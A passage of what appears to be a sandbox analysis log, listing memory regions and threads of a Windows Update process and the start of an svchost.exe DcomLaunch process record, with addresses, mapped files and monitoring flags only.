name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5980
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5981
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5982
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5983
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5984
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5985
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5986
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5987
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5988
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5989
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5990
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5991
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5992
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5993
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5994
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5995
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5996
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5997
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5998
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5999
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6000
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6001
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6002
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6003
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6004
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6005
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6006
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6007
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6008
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6009
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6010
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6011
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6012
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6013
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6014
start_va = 0x1420000
end_va = 0x142ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001420000"
filename = ""
Region:
id = 6015
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6016
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6017
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6018
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6019
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6020
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6021
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6022
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6023
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6024
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6025
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6026
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6027
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6028
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6029
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6030
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6031
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6035
start_va = 0x22d0000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022d0000"
filename = ""
Region:
id = 6036
start_va = 0x2b20000
end_va = 0x2b9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b20000"
filename = ""
Region:
id = 6037
start_va = 0x7fef3d80000
end_va = 0x7fef3f53fff
monitored = 0
entry_point = 0x7fef3db6b00
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 6038
start_va = 0x6cf0000
end_va = 0x6efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006cf0000"
filename = ""
Region:
id = 6039
start_va = 0x2980000
end_va = 0x2a8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002980000"
filename = ""
Region:
id = 6040
start_va = 0x6cf0000
end_va = 0x6e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006cf0000"
filename = ""
Region:
id = 6041
start_va = 0x6e80000
end_va = 0x6efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006e80000"
filename = ""
Region:
id = 6042
start_va = 0x6f00000
end_va = 0x72fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006f00000"
filename = ""
Region:
id = 6043
start_va = 0x10a0000
end_va = 0x10a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msxml3r.dll"
filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll")
Region:
id = 6044
start_va = 0x10b0000
end_va = 0x10cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010b0000"
filename = ""
Region:
id = 6045
start_va = 0x7fefaab0000
end_va = 0x7fefab2bfff
monitored = 0
entry_point = 0x7fefaab11d4
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Region:
id = 6046
start_va = 0x7300000
end_va = 0x746ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007300000"
filename = ""
Region:
id = 6047
start_va = 0x10d0000
end_va = 0x10d2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wuaueng.dll.mui"
filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui")
Region:
id = 6048
start_va = 0x10e0000
end_va = 0x10effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6049
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6050
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6051
start_va = 0x10e0000
end_va = 0x10effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6052
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6053
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6054
start_va = 0x23b0000
end_va = 0x242ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023b0000"
filename = ""
Region:
id = 6055
start_va = 0x2bb0000
end_va = 0x2c2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002bb0000"
filename = ""
Region:
id = 6056
start_va = 0x2ce0000
end_va = 0x2d5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ce0000"
filename = ""
Region:
id = 6057
start_va = 0x5910000
end_va = 0x598ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005910000"
filename = ""
Region:
id = 6058
start_va = 0x7fffff88000
end_va = 0x7fffff89fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff88000"
filename = ""
Region:
id = 6059
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 6060
start_va = 0x7fffff8e000
end_va = 0x7fffff8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8e000"
filename = ""
Region:
id = 6061
start_va = 0x7fffff94000
end_va = 0x7fffff95fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff94000"
filename = ""
Region:
id = 6070
start_va = 0x6cf0000
end_va = 0x6d99fff
monitored = 0
entry_point = 0x6cf4104
region_type = mapped_file
name = "wuapi.dll"
filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll")
Region:
id = 6071
start_va = 0x6de0000
end_va = 0x6e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006de0000"
filename = ""
Region:
id = 6072
start_va = 0x10e0000
end_va = 0x10ecfff
monitored = 0
entry_point = 0x10ea138
region_type = mapped_file
name = "wuauclt.exe"
filename = "\\Windows\\System32\\wuauclt.exe" (normalized: "c:\\windows\\system32\\wuauclt.exe")
Region:
id = 6073
start_va = 0x7470000
end_va = 0x76befff
monitored = 0
entry_point = 0x747236c
region_type = mapped_file
name = "wuaueng.dll"
filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll")
Region:
id = 6074
start_va = 0x10e0000
end_va = 0x10effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6075
start_va = 0x6d10000
end_va = 0x6d8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006d10000"
filename = ""
Region:
id = 6076
start_va = 0x7fffff86000
end_va = 0x7fffff87fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff86000"
filename = ""
Region:
id = 6077
start_va = 0x10f0000
end_va = 0x10fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6078
start_va = 0x1100000
end_va = 0x110ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Thread:
id = 155
os_tid = 0x49c
Thread:
id = 156
os_tid = 0x474
Thread:
id = 157
os_tid = 0x470
Thread:
id = 158
os_tid = 0x418
Thread:
id = 159
os_tid = 0x414
Thread:
id = 160
os_tid = 0x46c
Thread:
id = 161
os_tid = 0x468
Thread:
id = 162
os_tid = 0x460
Thread:
id = 163
os_tid = 0x21c
Thread:
id = 164
os_tid = 0x1e0
Thread:
id = 165
os_tid = 0xd0
Thread:
id = 166
os_tid = 0x3f4
Thread:
id = 167
os_tid = 0x3e8
Thread:
id = 168
os_tid = 0x39c
Thread:
id = 169
os_tid = 0x398
Thread:
id = 170
os_tid = 0x394
Thread:
id = 171
os_tid = 0x38c
Thread:
id = 172
os_tid = 0x37c
Thread:
id = 173
os_tid = 0x374
Thread:
id = 175
os_tid = 0x614
Thread:
id = 176
os_tid = 0x618
Thread:
id = 177
os_tid = 0x63c
Thread:
id = 178
os_tid = 0x650
Thread:
id = 179
os_tid = 0x654
Thread:
id = 180
os_tid = 0x660
Thread:
id = 181
os_tid = 0x674
Thread:
id = 182
os_tid = 0x67c
Thread:
id = 183
os_tid = 0x680
Thread:
id = 184
os_tid = 0x68c
Thread:
id = 185
os_tid = 0x69c
Thread:
id = 186
os_tid = 0x6ac
Thread:
id = 187
os_tid = 0x6b8
Thread:
id = 188
os_tid = 0x6c0
Thread:
id = 189
os_tid = 0x6c4
Thread:
id = 190
os_tid = 0x6c8
Thread:
id = 191
os_tid = 0x704
Thread:
id = 192
os_tid = 0x784
Thread:
id = 193
os_tid = 0x788
Thread:
id = 194
os_tid = 0x78c
Thread:
id = 195
os_tid = 0x798
Thread:
id = 196
os_tid = 0x7a0
Thread:
id = 197
os_tid = 0x7a4
Thread:
id = 198
os_tid = 0x7a8
Thread:
id = 199
os_tid = 0x5bc
Thread:
id = 200
os_tid = 0x5c4
Thread:
id = 201
os_tid = 0x5cc
Thread:
id = 202
os_tid = 0x5d8
Thread:
id = 203
os_tid = 0x3a4
Thread:
id = 204
os_tid = 0x610
Thread:
id = 205
os_tid = 0x630
Thread:
id = 206
os_tid = 0x648
Thread:
id = 227
os_tid = 0x334
Thread:
id = 228
os_tid = 0x330
Thread:
id = 229
os_tid = 0x32c
Thread:
id = 230
os_tid = 0x72c
Thread:
id = 231
os_tid = 0x344
Thread:
id = 232
os_tid = 0x324
Thread:
id = 233
os_tid = 0x328
Thread:
id = 234
os_tid = 0x33c
Thread:
id = 235
os_tid = 0x340
Thread:
id = 236
os_tid = 0x31c
Thread:
id = 237
os_tid = 0x318
Thread:
id = 238
os_tid = 0x66c
Thread:
id = 266
os_tid = 0x794
Thread:
id = 267
os_tid = 0x520
Thread:
id = 268
os_tid = 0x764
Thread:
id = 269
os_tid = 0x74c
Thread:
id = 270
os_tid = 0x490
Thread:
id = 271
os_tid = 0x4c4
Thread:
id = 272
os_tid = 0x72c
Thread:
id = 273
os_tid = 0x4dc
Thread:
id = 274
os_tid = 0x324
Thread:
id = 275
os_tid = 0x33c
Thread:
id = 276
os_tid = 0x69c
Thread:
id = 278
os_tid = 0x568
Thread:
id = 279
os_tid = 0x510
Thread:
id = 280
os_tid = 0x45c
Thread:
id = 281
os_tid = 0x448
Thread:
id = 282
os_tid = 0x528
Thread:
id = 285
os_tid = 0x9c
Process:
id = "28"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0xbf22000"
os_pid = "0x260"
os_integrity_level = "0x4000"
os_privileges = "0x60b00080"
monitor_reason = "rpc_server"
parent_id = "27"
os_parent_pid = "0x1d0"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00007866" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 4414
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4415
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 4416
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4417
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4418
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 4419
start_va = 0xd0000
end_va = 0x136fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4420
start_va = 0x140000
end_va = 0x23ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 4421
start_va = 0x240000
end_va = 0x240fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000240000"
filename = ""
Region:
id = 4422
start_va = 0x250000
end_va = 0x250fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 4423
start_va = 0x260000
end_va = 0x35ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 4424
start_va = 0x360000
end_va = 0x36cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 4425
start_va = 0x370000
end_va = 0x370fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000370000"
filename = ""
Region:
id = 4426
start_va = 0x380000
end_va = 0x380fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000380000"
filename = ""
Region:
id = 4427
start_va = 0x390000
end_va = 0x390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000390000"
filename = ""
Region:
id = 4428
start_va = 0x3a0000
end_va = 0x3a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003a0000"
filename = ""
Region:
id = 4429
start_va = 0x3b0000
end_va = 0x3b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 4430
start_va = 0x3e0000
end_va = 0x45ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
